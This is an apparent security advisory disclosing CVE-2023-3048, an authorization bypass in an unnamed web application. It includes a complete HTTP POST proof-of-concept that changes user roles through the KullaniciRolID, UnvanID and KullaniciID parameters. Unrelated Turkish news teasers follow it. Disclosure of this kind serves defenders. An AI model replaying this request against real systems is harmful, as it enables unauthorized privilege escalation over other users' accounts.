CVE-2023-3048 Authorization Bypass Through User-Controlled Key vulnerability allows Authentication Abuse, Authentication Bypass

CVE-ID: CVE-2023-3048

Author: Efe Özel

Team: Ömer Yılmaz – Murat Öztürk

Parameter: KullaniciRolID & UnvanID & KullaniciID

Details: By changing “KullaniciRolID” and “UnvanID”, the existing role or the roles of other users can be changed using the “KullaniciID”parameter.

HTTP REQUEST

				
					POST /Ayarlar/K_Hesap?Length=12 HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 151

Origin: http://127.0.0.1

Connection: close

Referer: http://127.0.0.1/Ayarlar/KullaniciAyari/20

Cookie: admin=20



KullaniciID=20&KullaniciID=20&AdSoyad=Talas&Eposta=test@test.com&KullaniciRolID=2&UnvanID=1&Tel1=44444&Tel2=44444&X-Requested-With=XMLHttpRequest
				
			

İlgili Yazılar

cisco-ip-telefonlarinda-kritik-guvenlik-acigi-kesfedildi

Cisco IP Telefonlarında Kritik Güvenlik Açığı Keşfedildi

Cisco, IP telefon web sunucusunda kimliği doğrulanmamış bir saldırgan tarafından uzaktan kod yürütülmesine olanak sağlayan kritik bir güvenlik açığının önüne...

2020 Yaz Dönemi Staj Başvuruları Hakkında

Covid-19 salgını nedeniyle 2020 yaz döneminde stajer öğrenci alımı yapılmayacaktır. Fordefence Adli Bilişim Laboratuvarı...
covid-19-tedbirlerinden-mobil-cihaz-temizligi-nasil-olmali

Covid-19 tedbirlerinden Mobil cihaz temizliği nasıl olmalı

Ceo’muz Mustafa SANSAR Haber Global Ana Haber’e ‘Covid-19 tedbirlerinden, Mobil cihaz temizliği nasıl olmalı’ Konularında görüşlerini aktardı. ...